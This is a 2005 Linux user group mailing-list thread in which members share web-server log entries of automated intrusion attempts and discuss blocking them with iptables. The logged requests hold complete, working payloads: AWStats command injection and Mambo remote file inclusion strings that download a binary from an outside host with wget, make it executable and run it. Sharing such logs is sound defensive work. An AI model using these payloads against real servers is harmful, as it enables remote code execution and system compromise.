[plug] Scripted hacking attempts

Bennett, Phillip Phillip.Bennett at bestroads.com.au
Thu Dec 22 13:47:36 WST 2005 

Bill,

May I have a copy of this script for my system at home?

Thanks,
Phil.
 

-----Original Message-----
From: plug-bounces at plug.org.au [mailto:plug-bounces at plug.org.au] On
Behalf Of William Kenworthy
Sent: Wednesday, 21 December 2005 7:21 PM
To: plug at plug.org.au
Subject: Re: [plug] Scripted hacking attempts

They've been around for a few weeks.  I drop them using a string match
on port 80 (iptables), and once theve triggered it, all packets to/from
that source are dropped - no point in letting them try something else
that I might have missed!  I think most came from china from memory -
geoip helps there, as well as blocking the messenger spam.

BillK


On Wed, 2005-12-21 at 17:02 +0800, Kai wrote:
> Hi guys and girls,
> 
> FYI, I don't know if anyone else is seeing a rash of these but I've 
> had a few in the last coupla days.
> 
> 12.175.196.99 - - [21/Dec/2005:10:55:02 +0800] "GET 
>
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%
2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e
102%2e212%2e115;echo%20YYY;echo|
>   HTTP/1.1" 404 340
> 12.175.196.99 - - [21/Dec/2005:10:55:06 +0800] "GET 
>
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%
2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e
102%2e212%2e115;echo%20YYY;echo|
>   HTTP/1.1" 404 340
> 12.175.196.99 - - [21/Dec/2005:10:55:13 +0800] "GET 
>
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=c
om_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81
.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%207
44%20listen;./listen;echo%20YYY;echo|
>   HTTP/1.1" 404 331
> 12.175.196.99 - - [21/Dec/2005:10:55:08 +0800] "GET 
>
/cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwge
t%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%
20216%2e102%2e212%2e115;echo%20YYY;echo|
>   HTTP/1.1" 404 348
> 12.175.196.99 - - [21/Dec/2005:10:55:10 +0800] "GET 
>
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=
com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://8
1.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20
744%20listen;./listen;echo%20YYY;echo|
>   HTTP/1.1" 404 332
> 12.175.196.99 - - [21/Dec/2005:10:55:14 +0800] "GET 
>
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBAL
S=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;w
get%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo
|
>   HTTP/1.1" 404 338
> 12.175.196.99 - - [21/Dec/2005:10:55:17 +0800] "GET 
>
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wge
t%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
>   HTTP/1.1" 404 336
> 12.175.196.99 - - [21/Dec/2005:10:55:23 +0800] "GET 
>
/cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GL
OBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/t
mp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;
echo|
>   HTTP/1.1" 404 342
> 
> Cheers
> Kai
> 
--
William Kenworthy <billk at iinet.net.au>
Home!
_______________________________________________
PLUG discussion list: plug at plug.org.au
http://www.plug.org.au/mailman/listinfo/plug
Committee e-mail: committee at plug.linux.org.au

More information about the plug mailing list